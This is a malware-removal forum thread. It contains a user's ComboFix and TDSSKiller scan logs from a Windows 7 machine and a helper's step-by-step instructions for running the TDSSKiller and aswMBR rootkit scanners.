S3 TuneUpUtilitiesDrv;TuneUpUtilitiesDrv;c:\program files (x86)\TuneUp Utilities 2012\TuneUpUtilitiesDriver64.sys [2011-12-12 11856]
.
.
--- Other Services/Drivers In Memory ---
.
*NewlyCreated* - WS2IFSL
.
Contents of the 'Scheduled Tasks' folder
.
2012-04-16 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2012-04-08 23:44]
.
2012-04-16 c:\windows\Tasks\AutoKMS.job
- c:\windows\AutoKMS.exe [2012-03-14 14:23]
.
2012-04-14 c:\windows\Tasks\FacebookUpdateTaskUserS-1-5-21-450020240-1868592112-3265372428-1000Core.job
- c:\users\Vincent\AppData\Local\Facebook\Update\FacebookUpdate.exe [2012-04-06 22:05]
.
2012-04-15 c:\windows\Tasks\FacebookUpdateTaskUserS-1-5-21-450020240-1868592112-3265372428-1000UA.job
- c:\users\Vincent\AppData\Local\Facebook\Update\FacebookUpdate.exe [2012-04-06 22:05]
.
.
--------- x86-64 -----------
.
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Apoint"="c:\program files\Apoint2K\Apoint.exe" [2009-05-14 318464]
"SysTrayApp"="c:\program files\IDT\WDM\sttray64.exe" [2010-03-23 487424]
"egui"="c:\program files\ESET\ESET Smart Security\egui.exe" [2011-09-22 4035152]
"TNod UP"="c:\users\Vincent\Downloads\TNOD Update\TNod-1.4.1-Final-Portable\TNODUP.exe" [2011-09-18 1892352]
"AdobeAAMUpdater-1.0"="c:\program files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe" [2010-03-06 500208]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"LoadAppInit_DLLs"=0x0
.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost - NetSvcs
UxTuneUp
.
------- Supplementary Scan -------
.
uLocal Page = c:\windows\system32\blank.htm
mLocal Page = c:\windows\SysWOW64\blank.htm
uInternet Settings,ProxyOverride = *.local;192.168.*.*
IE: E&xport to Microsoft Excel - c:\progra~2\MICROS~3\Office14\EXCEL.EXE/3000
TCP: DhcpNameServer = 194.168.4.100 194.168.8.100
FF - ProfilePath - c:\users\Vincent\AppData\Roaming\Mozilla\Firefox\Profiles\febeprof.test\
FF - prefs.js: browser.startup.homepage - hxxps://www.facebook.com/|http://www.thepiratebay.org
FF - user.js: network.http.max-persistent-connections-per-server - 4
FF - user.js: nglayout.initialpaint.delay - 600
FF - user.js: content.notify.interval - 600000
FF - user.js: content.max.tokenizing.time - 1800000
FF - user.js: content.switch.threshold - 600000
.
- - - - ORPHANS REMOVED - - - -
.
AddRemove-Adobe Shockwave Player - c:\windows\system32\Adobe\Shockwave 11\uninstaller.exe
AddRemove-PunkBusterSvc - c:\windows\system32\pbsvc_blr.exe
.
.
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\S-1-5-21-450020240-1868592112-3265372428-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.eml\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="WindowsLiveMail.Email.1"
.
[HKEY_USERS\S-1-5-21-450020240-1868592112-3265372428-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vcf\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="WindowsLiveMail.VCard.1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A483C63A-CDBC-426E-BF93-872502E8144E}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_11_2_202_233_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A483C63A-CDBC-426E-BF93-872502E8144E}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A483C63A-CDBC-426E-BF93-872502E8144E}\LocalServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_11_2_202_233_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A483C63A-CDBC-426E-BF93-872502E8144E}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Shockwave Flash Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_11_2_202_233.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\MiscStatus]
@="0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ProgID]
@="ShockwaveFlash.ShockwaveFlash.11"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_11_2_202_233.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\TypeLib]
------------------------ Other Running Processes ------------------------
.
c:\program files (x86)\Bonjour\mDNSResponder.exe
c:\windows\SysWOW64\PnkBstrA.exe
c:\program files (x86)\Motorola\MotoHelper\MotoHelperAgent.exe
.
**************************************************************************
.
Completion time: 2012-04-16 21:14:18 - machine was rebooted
ComboFix-quarantined-files.txt 2012-04-16 20:14
.
Pre-Run: 102,328,553,472 bytes free
Post-Run: 102,103,523,328 bytes free
.
- - End Of File - - E96B82BE8B654D66FAD044CF313FEF44

Thanks

#4 gringo_pr (Bleepin Gringo)

  • Malware Response Team
  • 136,772 posts
  • Gender:Male
  • Location:Puerto rico

Posted 16 April 2012 - 05:54 PM

Greetings

I want you to run these next.

TDSSKiller:

Please read carefully and follow these steps.
  • Download TDSSKiller and save it to your Desktop.
  • Double-click on TDSSKiller.exe to run the application, then click on Start Scan.
  • If an infected file is detected, the default action will be Cure; click on Continue.
  • If a suspicious file is detected, the default action will be Skip; click on Continue.
  • It may ask you to reboot the computer to complete the process. Click on Reboot Now.
  • If no reboot is required, click on Report. A log file should appear. Please copy and paste the contents of that file here.
  • If a reboot is required, the report can also be found in your root directory (usually the C:\ folder) in the form of "TDSSKiller.[Version]_[Date]_[Time]_log.txt". Please copy and paste the contents of that file here.

Please download aswMBR to your desktop.
  • Double-click the aswMBR.exe icon to run it.
  • It will ask to download extra definitions - ALLOW IT.
  • Click the Scan button to start the scan.
  • On completion of the scan, click the Save log button, save it to your desktop and post it in your next reply.

If you have any problems running either one, come back and let me know.

Please reply with the reports from TDSSKiller and aswMBR.

Gringo
I Close My Topics If You Have Not Replied In 5 Days If You Will Be Longer Please Let Me Know

If I Have Not Replied To One Of My Topics In 48 Hrs Please Bump The Topic



My help is free; however, if you wish to make a small donation to show your appreciation or to help me continue the fight against Malware, then click here. Don't worry, every little bit helps.

Proud Graduate Of Malware Removal University

#5 vinnie946 (Topic Starter)

  • Members
  • 5 posts

Posted 17 April 2012 - 02:42 PM

TDSSKiller:

16:50:08.0360 1864 TDSS rootkit removing tool 2.7.28.0 Apr 10 2012 16:54:05
16:50:09.0187 1864 ============================================================
16:50:09.0187 1864 Current date / time: 2012/04/17 16:50:09.0187
16:50:09.0187 1864 SystemInfo:
16:50:09.0187 1864
16:50:09.0187 1864 OS Version: 6.1.7601 ServicePack: 1.0
16:50:09.0187 1864 Product type: Workstation
16:50:09.0187 1864 ComputerName: VINCENT-PC
16:50:09.0187 1864 UserName: Vincent
16:50:09.0187 1864 Windows directory: C:\Windows
16:50:09.0187 1864 System windows directory: C:\Windows
16:50:09.0187 1864 Running under WOW64
16:50:09.0187 1864 Processor architecture: Intel x64
16:50:09.0187 1864 Number of processors: 2
16:50:09.0187 1864 Page size: 0x1000
16:50:09.0187 1864 Boot type: Normal boot
16:50:09.0187 1864 ============================================================
16:50:10.0123 1864 Drive \Device\Harddisk0\DR0 - Size: 0x4A85D56000 (298.09 Gb), SectorSize: 0x200, Cylinders: 0x9801, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000040
16:50:10.0123 1864 \Device\Harddisk0\DR0:
16:50:10.0138 1864 MBR used
16:50:10.0138 1864 \Device\Harddisk0\DR0\Partition0: MBR, Type 0x7, StartLBA 0x800, BlocksNum 0x63800
16:50:10.0138 1864 \Device\Harddisk0\DR0\Partition1: MBR, Type 0x7, StartLBA 0x64000, BlocksNum 0x253C9800
16:50:10.0154 1864 Initialize success
16:50:10.0154 1864 ============================================================
16:50:16.0831 5136 ============================================================
16:50:16.0831 5136 Scan started
16:50:16.0831 5136 Mode: Manual;
16:50:16.0831 5136 ============================================================
16:50:28.0780 5136 NdisWan (53f7305169863f0a2bddc49e116c2e11) C:\Windows\system32\DRIVERS\ndiswan.sys
16:50:28.0780 5136 NdisWan - ok
16:50:28.0812 5136 NDProxy (015c0d8e0e0421b4cfd48cffe2825879) C:\Windows\system32\drivers\NDProxy.sys
16:50:28.0812 5136 NDProxy - ok
16:50:28.0843 5136 NetBIOS (86743d9f5d2b1048062b14b1d84501c4) C:\Windows\system32\DRIVERS\netbios.sys
16:50:28.0843 5136 NetBIOS - ok
16:50:28.0874 5136 NetBT (09594d1089c523423b32a4229263f068) C:\Windows\system32\DRIVERS\netbt.sys
16:50:28.0874 5136 NetBT - ok
16:50:28.0921 5136 Netlogon (c118a82cd78818c29ab228366ebf81c3) C:\Windows\system32\lsass.exe
16:50:28.0921 5136 Netlogon - ok
16:50:28.0952 5136 Netman (847d3ae376c0817161a14a82c8922a9e) C:\Windows\System32\netman.dll
16:50:28.0952 5136 Netman - ok
16:50:28.0983 5136 netprofm (5f28111c648f1e24f7dbc87cdeb091b8) C:\Windows\System32\netprofm.dll
16:50:28.0999 5136 netprofm - ok
16:50:29.0061 5136 NetTcpPortSharing (3e5a36127e201ddf663176b66828fafe) C:\Windows\Microsoft.NET\Framework64\v3.0\Windows Communication Foundation\SMSvcHost.exe
16:50:29.0077 5136 NetTcpPortSharing - ok
16:50:29.0248 5136 NETw5s64 (39ede676d17f37af4573c2b33ec28aca) C:\Windows\system32\DRIVERS\NETw5s64.sys
16:50:29.0326 5136 NETw5s64 - ok
16:50:29.0420 5136 nfrd960 (77889813be4d166cdab78ddba990da92) C:\Windows\system32\DRIVERS\nfrd960.sys
16:50:29.0420 5136 nfrd960 - ok
16:50:29.0467 5136 NlaSvc (1ee99a89cc788ada662441d1e9830529) C:\Windows\System32\nlasvc.dll
16:50:29.0482 5136 NlaSvc - ok
16:50:29.0529 5136 NMgamingmsFltr (fbca3fd51604147770eb4fb53d6144a8) C:\Windows\system32\drivers\NMgamingms.sys
16:50:29.0529 5136 NMgamingmsFltr - ok
16:50:29.0545 5136 Npfs (1e4c4ab5c9b8dd13179bbdc75a2a01f7) C:\Windows\system32\drivers\Npfs.sys
16:50:29.0545 5136 Npfs - ok
16:50:29.0576 5136 nsi (d54bfdf3e0c953f823b3d0bfe4732528) C:\Windows\system32\nsisvc.dll
16:50:29.0576 5136 nsi - ok
16:50:29.0592 5136 nsiproxy (e7f5ae18af4168178a642a9247c63001) C:\Windows\system32\drivers\nsiproxy.sys
16:50:29.0592 5136 nsiproxy - ok
16:50:29.0654 5136 Ntfs (a2f74975097f52a00745f9637451fdd8) C:\Windows\system32\drivers\Ntfs.sys
16:50:29.0685 5136 Ntfs - ok
16:50:29.0763 5136 Null (9899284589f75fa8724ff3d16aed75c1) C:\Windows\system32\drivers\Null.sys
16:50:29.0763 5136 Null - ok
16:50:29.0826 5136 NVHDA (8d4aac74b571fc356560e5b308955e93) C:\Windows\system32\drivers\nvhda64v.sys
16:50:29.0826 5136 NVHDA - ok
16:50:30.0184 5136 nvlddmkm (0eb204639119370f5f8f2871fbf4e14b) C:\Windows\system32\DRIVERS\nvlddmkm.sys
16:50:30.0496 5136 nvlddmkm - ok
16:50:30.0590 5136 nvraid (0a92cb65770442ed0dc44834632f66ad) C:\Windows\system32\drivers\nvraid.sys
16:50:30.0590 5136 nvraid - ok
16:50:30.0621 5136 nvstor (dab0e87525c10052bf65f06152f37e4a) C:\Windows\system32\drivers\nvstor.sys
16:50:30.0621 5136 nvstor - ok
16:50:30.0684 5136 nvsvc (32ff8ee6dcee5c0cb91ff892fb1ca364) C:\Windows\system32\nvvsvc.exe
16:50:30.0699 5136 nvsvc - ok
16:50:30.0840 5136 nvUpdatusService (bd012dc22c78be1071bc21eb125d782f) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
16:50:30.0840 5136 nvUpdatusService - ok
16:50:30.0933 5136 nv_agp (270d7cd42d6e3979f6dd0146650f0e05) C:\Windows\system32\drivers\nv_agp.sys
16:50:30.0949 5136 nv_agp - ok
16:50:30.0980 5136 ohci1394 (3589478e4b22ce21b41fa1bfc0b8b8a0) C:\Windows\system32\drivers\ohci1394.sys
16:50:30.0980 5136 ohci1394 - ok
16:50:31.0027 5136 ose (9d10f99a6712e28f8acd5641e3a7ea6b) C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE
16:50:31.0027 5136 ose - ok
16:50:31.0167 5136 osppsvc (61bffb5f57ad12f83ab64b7181829b34) C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
16:50:31.0230 5136 osppsvc - ok
16:50:31.0323 5136 p2pimsvc (3eac4455472cc2c97107b5291e0dcafe) C:\Windows\system32\pnrpsvc.dll
16:50:31.0323 5136 p2pimsvc - ok
16:50:31.0354 5136 p2psvc (927463ecb02179f88e4b9a17568c63c3) C:\Windows\system32\p2psvc.dll
16:50:31.0370 5136 p2psvc - ok
16:50:31.0401 5136 Parport (0086431c29c35be1dbc43f52cc273887) C:\Windows\system32\DRIVERS\parport.sys
16:50:31.0401 5136 Parport - ok
16:50:31.0448 5136 partmgr (871eadac56b0a4c6512bbe32753ccf79) C:\Windows\system32\drivers\partmgr.sys
16:50:31.0448 5136 partmgr - ok
16:50:31.0464 5136 PcaSvc (3aeaa8b561e63452c655dc0584922257) C:\Windows\System32\pcasvc.dll
16:50:31.0464 5136 PcaSvc - ok
16:50:31.0479 5136 pci (94575c0571d1462a0f70bde6bd6ee6b3) C:\Windows\system32\drivers\pci.sys
16:50:31.0479 5136 pci - ok
16:50:31.0510 5136 pciide (b5b8b5ef2e5cb34df8dcf8831e3534fa) C:\Windows\system32\drivers\pciide.sys
16:50:31.0510 5136 pciide - ok
16:50:31.0526 5136 pcmcia (b2e81d4e87ce48589f98cb8c05b01f2f) C:\Windows\system32\DRIVERS\pcmcia.sys
16:50:31.0526 5136 pcmcia - ok
16:50:31.0542 5136 pcw (d6b9c2e1a11a3a4b26a182ffef18f603) C:\Windows\system32\drivers\pcw.sys
16:50:31.0542 5136 pcw - ok
16:50:31.0588 5136 PEAUTH (68769c3356b3be5d1c732c97b9a80d6e) C:\Windows\system32\drivers\peauth.sys
16:50:31.0588 5136 PEAUTH - ok
16:50:31.0698 5136 PeerDistSvc (b9b0a4299dd2d76a4243f75fd54dc680) C:\Windows\system32\peerdistsvc.dll
16:50:31.0729 5136 PeerDistSvc - ok
16:50:31.0807 5136 PerfHost (e495e408c93141e8fc72dc0c6046ddfa) C:\Windows\SysWow64\perfhost.exe
16:50:31.0807 5136 PerfHost - ok
16:50:31.0869 5136 pla (c7cf6a6e137463219e1259e3f0f0dd6c) C:\Windows\system32\pla.dll
16:50:31.0885 5136 pla - ok
16:50:31.0978 5136 PlugPlay (25fbdef06c4d92815b353f6e792c8129) C:\Windows\system32\umpnpmgr.dll
16:50:31.0994 5136 PlugPlay - ok
16:50:32.0010 5136 PnkBstrA - ok
16:50:32.0041 5136 PNRPAutoReg (7195581cec9bb7d12abe54036acc2e38) C:\Windows\system32\pnrpauto.dll
16:50:32.0041 5136 PNRPAutoReg - ok
16:50:32.0072 5136 PNRPsvc (3eac4455472cc2c97107b5291e0dcafe) C:\Windows\system32\pnrpsvc.dll
16:50:32.0072 5136 PNRPsvc - ok
16:50:32.0103 5136 PolicyAgent (4f15d75adf6156bf56eced6d4a55c389) C:\Windows\System32\ipsecsvc.dll
16:50:32.0103 5136 PolicyAgent - ok
16:50:32.0134 5136 Power (6ba9d927dded70bd1a9caded45f8b184) C:\Windows\system32\umpo.dll
16:50:32.0134 5136 Power - ok
16:50:32.0212 5136 PptpMiniport (f92a2c41117a11a00be01ca01a7fcde9) C:\Windows\system32\DRIVERS\raspptp.sys
16:50:32.0212 5136 PptpMiniport - ok
16:50:32.0275 5136 Processor (0d922e23c041efb1c3fac2a6f943c9bf) C:\Windows\system32\DRIVERS\processr.sys
16:50:32.0290 5136 Processor - ok
16:50:32.0306 5136 ProfSvc (5c78838b4d166d1a27db3a8a820c799a) C:\Windows\system32\profsvc.dll
16:50:32.0306 5136 ProfSvc - ok
16:50:32.0337 5136 ProtectedStorage (c118a82cd78818c29ab228366ebf81c3) C:\Windows\system32\lsass.exe
16:50:32.0337 5136 ProtectedStorage - ok
16:50:32.0384 5136 Psched (0557cf5a2556bd58e26384169d72438d) C:\Windows\system32\DRIVERS\pacer.sys
16:50:32.0384 5136 Psched - ok
16:50:32.0415 5136 ql2300 (a53a15a11ebfd21077463ee2c7afeef0) C:\Windows\system32\DRIVERS\ql2300.sys
16:50:32.0446 5136 ql2300 - ok
16:50:32.0462 5136 ql40xx (4f6d12b51de1aaeff7dc58c4d75423c8) C:\Windows\system32\DRIVERS\ql40xx.sys
16:50:32.0462 5136 ql40xx - ok
16:50:32.0493 5136 QWAVE (906191634e99aea92c4816150bda3732) C:\Windows\system32\qwave.dll
16:50:32.0493 5136 QWAVE - ok
16:50:32.0571 5136 QWAVEdrv (76707bb36430888d9ce9d705398adb6c) C:\Windows\system32\drivers\qwavedrv.sys
16:50:32.0571 5136 QWAVEdrv - ok
16:50:32.0602 5136 RasAcd (5a0da8ad5762fa2d91678a8a01311704) C:\Windows\system32\DRIVERS\rasacd.sys
16:50:32.0602 5136 RasAcd - ok
16:50:32.0634 5136 RasAgileVpn (7ecff9b22276b73f43a99a15a6094e90) C:\Windows\system32\DRIVERS\AgileVpn.sys
16:50:32.0634 5136 RasAgileVpn - ok
16:50:32.0649 5136 RasAuto (8f26510c5383b8dbe976de1cd00fc8c7) C:\Windows\System32\rasauto.dll
16:50:32.0665 5136 RasAuto - ok
16:50:32.0680 5136 Rasl2tp (471815800ae33e6f1c32fb1b97c490ca) C:\Windows\system32\DRIVERS\rasl2tp.sys
16:50:32.0680 5136 Rasl2tp - ok
16:50:32.0712 5136 RasMan (ee867a0870fc9e4972ba9eaad35651e2) C:\Windows\System32\rasmans.dll
16:50:32.0727 5136 RasMan - ok
16:50:32.0727 5136 RasPppoe (855c9b1cd4756c5e9a2aa58a15f58c25) C:\Windows\system32\DRIVERS\raspppoe.sys
16:50:32.0727 5136 RasPppoe - ok
16:50:32.0758 5136 RasSstp (e8b1e447b008d07ff47d016c2b0eeecb) C:\Windows\system32\DRIVERS\rassstp.sys
16:50:32.0758 5136 RasSstp - ok
16:50:32.0774 5136 rdbss (77f665941019a1594d887a74f301fa2f) C:\Windows\system32\DRIVERS\rdbss.sys
16:50:32.0774 5136 rdbss - ok
16:50:32.0790 5136 rdpbus (302da2a0539f2cf54d7c6cc30c1f2d8d) C:\Windows\system32\DRIVERS\rdpbus.sys
16:50:32.0790 5136 rdpbus - ok
16:50:32.0805 5136 RDPCDD (cea6cc257fc9b7715f1c2b4849286d24) C:\Windows\system32\DRIVERS\RDPCDD.sys
16:50:32.0805 5136 RDPCDD - ok
16:50:32.0836 5136 RDPDR (1b6163c503398b23ff8b939c67747683) C:\Windows\system32\drivers\rdpdr.sys
16:50:32.0836 5136 RDPDR - ok
16:50:32.0852 5136 RDPENCDD (bb5971a4f00659529a5c44831af22365) C:\Windows\system32\drivers\rdpencdd.sys
16:50:32.0852 5136 RDPENCDD - ok
16:50:32.0868 5136 RDPREFMP (216f3fa57533d98e1f74ded70113177a) C:\Windows\system32\drivers\rdprefmp.sys
16:50:32.0868 5136 RDPREFMP - ok
16:50:32.0930 5136 RdpVideoMiniport (70cba1a0c98600a2aa1863479b35cb90) C:\Windows\system32\drivers\rdpvideominiport.sys
16:50:32.0930 5136 RdpVideoMiniport - ok
16:50:33.0024 5136 RDPWD (6d76e6433574b058adcb0c50df834492) C:\Windows\system32\drivers\RDPWD.sys
16:50:33.0039 5136 RDPWD - ok
16:50:33.0070 5136 rdyboost (34ed295fa0121c241bfef24764fc4520) C:\Windows\system32\drivers\rdyboost.sys
16:50:33.0070 5136 rdyboost - ok
16:50:33.0102 5136 RemoteAccess (254fb7a22d74e5511c73a3f6d802f192) C:\Windows\System32\mprdim.dll
16:50:33.0102 5136 RemoteAccess - ok
16:50:33.0117 5136 RemoteRegistry (e4d94f24081440b5fc5aa556c7c62702) C:\Windows\system32\regsvc.dll
16:50:33.0133 5136 RemoteRegistry - ok
16:50:33.0148 5136 RpcEptMapper (e4dc58cf7b3ea515ae917ff0d402a7bb) C:\Windows\System32\RpcEpMap.dll
16:50:33.0148 5136 RpcEptMapper - ok
16:50:33.0164 5136 RpcLocator (d5ba242d4cf8e384db90e6a8ed850b8c) C:\Windows\system32\locator.exe
16:50:33.0164 5136 RpcLocator - ok
16:50:33.0211 5136 RpcSs (5c627d1b1138676c0a7ab2c2c190d123) C:\Windows\system32\rpcss.dll
16:50:33.0211 5136 RpcSs - ok
16:50:33.0242 5136 rspndr (ddc86e4f8e7456261e637e3552e804ff) C:\Windows\system32\DRIVERS\rspndr.sys
16:50:33.0242 5136 rspndr - ok
16:50:33.0336 5136 RTL8167 (ee082e06a82ff630351d1e0ebbd3d8d0) C:\Windows\system32\DRIVERS\Rt64win7.sys
16:50:33.0336 5136 RTL8167 - ok
16:50:33.0382 5136 s3cap (e60c0a09f997826c7627b244195ab581) C:\Windows\system32\drivers\vms3cap.sys
16:50:33.0382 5136 s3cap - ok
16:50:33.0414 5136 SamSs (c118a82cd78818c29ab228366ebf81c3) C:\Windows\system32\lsass.exe
16:50:33.0414 5136 SamSs - ok
16:50:33.0523 5136 SbieDrv (0fe05dd9bbf0782e2bbf0977f2034616) C:\Program Files\Sandboxie\SbieDrv.sys
16:50:33.0523 5136 SbieDrv - ok
16:50:33.0585 5136 SbieSvc (c970c7b2fd2e811525d4578d50b535f5) C:\Program Files\Sandboxie\SbieSvc.exe
16:50:33.0585 5136 SbieSvc - ok
16:50:33.0632 5136 sbp2port (ac03af3329579fffb455aa2daabbe22b) C:\Windows\system32\drivers\sbp2port.sys
16:50:33.0632 5136 sbp2port - ok
16:50:33.0772 5136 SBSDWSCService (794d4b48dfb6e999537c7c3947863463) C:\Program Files (x86)\Spybot - Search & Destroy\SDWinSec.exe
16:50:33.0772 5136 SBSDWSCService - ok
16:50:33.0835 5136 SCardSvr (9b7395789e3791a3b6d000fe6f8b131e) C:\Windows\System32\SCardSvr.dll
16:50:33.0835 5136 SCardSvr - ok
16:50:33.0882 5136 scfilter (253f38d0d7074c02ff8deb9836c97d2b) C:\Windows\system32\DRIVERS\scfilter.sys
16:50:33.0882 5136 scfilter - ok
16:50:33.0928 5136 Schedule (262f6592c3299c005fd6bec90fc4463a) C:\Windows\system32\schedsvc.dll
16:50:33.0944 5136 Schedule - ok
16:50:33.0991 5136 SCPolicySvc (f17d1d393bbc69c5322fbfafaca28c7f) C:\Windows\System32\certprop.dll
16:50:33.0991 5136 SCPolicySvc - ok
16:50:34.0022 5136 SDRSVC (6ea4234dc55346e0709560fe7c2c1972) C:\Windows\System32\SDRSVC.dll
16:50:34.0022 5136 SDRSVC - ok
16:50:34.0053 5136 secdrv (3ea8a16169c26afbeb544e0e48421186) C:\Windows\system32\drivers\secdrv.sys
16:50:34.0053 5136 secdrv - ok
16:50:34.0116 5136 seclogon (bc617a4e1b4fa8df523a061739a0bd87) C:\Windows\system32\seclogon.dll
16:50:34.0116 5136 seclogon - ok
16:50:34.0147 5136 SENS (c32ab8fa018ef34c0f113bd501436d21) C:\Windows\system32\sens.dll
16:50:34.0147 5136 SENS - ok
16:50:34.0162 5136 SensrSvc (0336cffafaab87a11541f1cf1594b2b2) C:\Windows\system32\sensrsvc.dll
16:50:34.0162 5136 SensrSvc - ok
16:50:34.0194 5136 Serenum (cb624c0035412af0debec78c41f5ca1b) C:\Windows\system32\DRIVERS\serenum.sys
16:50:34.0194 5136 Serenum - ok
16:50:34.0225 5136 Serial (c1d8e28b2c2adfaec4ba89e9fda69bd6) C:\Windows\system32\DRIVERS\serial.sys
16:50:34.0225 5136 Serial - ok
16:50:34.0256 5136 sermouse (1c545a7d0691cc4a027396535691c3e3) C:\Windows\system32\DRIVERS\sermouse.sys
16:50:34.0256 5136 sermouse - ok
16:50:34.0303 5136 SessionEnv (0b6231bf38174a1628c4ac812cc75804) C:\Windows\system32\sessenv.dll
16:50:34.0303 5136 SessionEnv - ok
16:50:34.0350 5136 sffdisk (a554811bcd09279536440c964ae35bbf) C:\Windows\system32\drivers\sffdisk.sys
16:50:34.0350 5136 sffdisk - ok
16:50:34.0381 5136 sffp_mmc (ff414f0baefeba59bc6c04b3db0b87bf) C:\Windows\system32\drivers\sffp_mmc.sys
16:50:34.0381 5136 sffp_mmc - ok
16:50:34.0396 5136 sffp_sd (dd85b78243a19b59f0637dcf284da63c) C:\Windows\system32\drivers\sffp_sd.sys
16:50:34.0396 5136 sffp_sd - ok
16:50:34.0443 5136 sfloppy (a9d601643a1647211a1ee2ec4e433ff4) C:\Windows\system32\DRIVERS\sfloppy.sys
16:50:34.0443 5136 sfloppy - ok
16:50:34.0506 5136 SharedAccess (b95f6501a2f8b2e78c697fec401970ce) C:\Windows\System32\ipnathlp.dll
16:50:34.0521 5136 SharedAccess - ok
16:50:34.0537 5136 ShellHWDetection (aaf932b4011d14052955d4b212a4da8d) C:\Windows\System32\shsvcs.dll
16:50:34.0552 5136 ShellHWDetection - ok
16:50:34.0584 5136 SiSRaid2 (843caf1e5fde1ffd5ff768f23a51e2e1) C:\Windows\system32\DRIVERS\SiSRaid2.sys
16:50:34.0584 5136 SiSRaid2 - ok
16:50:34.0599 5136 SiSRaid4 (6a6c106d42e9ffff8b9fcb4f754f6da4) C:\Windows\system32\DRIVERS\sisraid4.sys
16:50:34.0599 5136 SiSRaid4 - ok
16:50:34.0615 5136 Smb (548260a7b8654e024dc30bf8a7c5baa4) C:\Windows\system32\DRIVERS\smb.sys
16:50:34.0615 5136 Smb - ok
16:50:34.0677 5136 SNMPTRAP (6313f223e817cc09aa41811daa7f541d) C:\Windows\System32\snmptrap.exe
16:50:34.0677 5136 SNMPTRAP - ok
16:50:34.0724 5136 spldr (b9e31e5cacdfe584f34f730a677803f9) C:\Windows\system32\drivers\spldr.sys
16:50:34.0724 5136 spldr - ok
16:50:34.0755 5136 Spooler (b96c17b5dc1424d56eea3a99e97428cd) C:\Windows\System32\spoolsv.exe
16:50:34.0755 5136 Spooler - ok
16:50:34.0896 5136 sppsvc (e17e0188bb90fae42d83e98707efa59c) C:\Windows\system32\sppsvc.exe
16:50:34.0942 5136 sppsvc - ok
16:50:34.0989 5136 sppuinotify (93d7d61317f3d4bc4f4e9f8a96a7de45) C:\Windows\system32\sppuinotify.dll
16:50:35.0005 5136 sppuinotify - ok
16:50:35.0067 5136 srv (441fba48bff01fdb9d5969ebc1838f0b) C:\Windows\system32\DRIVERS\srv.sys
16:50:35.0083 5136 srv - ok
16:50:35.0098 5136 srv2 (b4adebbf5e3677cce9651e0f01f7cc28) C:\Windows\system32\DRIVERS\srv2.sys
16:50:35.0098 5136 srv2 - ok
16:50:35.0114 5136 srvnet (27e461f0be5bff5fc737328f749538c3) C:\Windows\system32\DRIVERS\srvnet.sys
16:50:35.0114 5136 srvnet - ok
16:50:35.0145 5136 SSDPSRV (51b52fbd583cde8aa9ba62b8b4298f33) C:\Windows\System32\ssdpsrv.dll
16:50:35.0161 5136 SSDPSRV - ok
16:50:35.0176 5136 SstpSvc (ab7aebf58dad8daab7a6c45e6a8885cb) C:\Windows\system32\sstpsvc.dll
16:50:35.0176 5136 SstpSvc - ok
16:50:35.0239 5136 STacSV (7595d53ee8e8b0baa9a2ddde867ebb0c) C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_960c1f056a541068\STacSV64.exe
16:50:35.0239 5136 STacSV - ok
16:50:35.0270 5136 stexstor (f3817967ed533d08327dc73bc4d5542a) C:\Windows\system32\DRIVERS\stexstor.sys
16:50:35.0270 5136 stexstor - ok
16:50:35.0348 5136 STHDA (dffbc024dfc7bb05b2129e05cbc7a201) C:\Windows\system32\DRIVERS\stwrt64.sys
16:50:35.0364 5136 STHDA - ok
16:50:35.0410 5136 stisvc (8dd52e8e6128f4b2da92ce27402871c1) C:\Windows\System32\wiaservc.dll
16:50:35.0426 5136 stisvc - ok
16:50:35.0457 5136 storflt (7785dc213270d2fc066538daf94087e7) C:\Windows\system32\drivers\vmstorfl.sys
16:50:35.0457 5136 storflt - ok
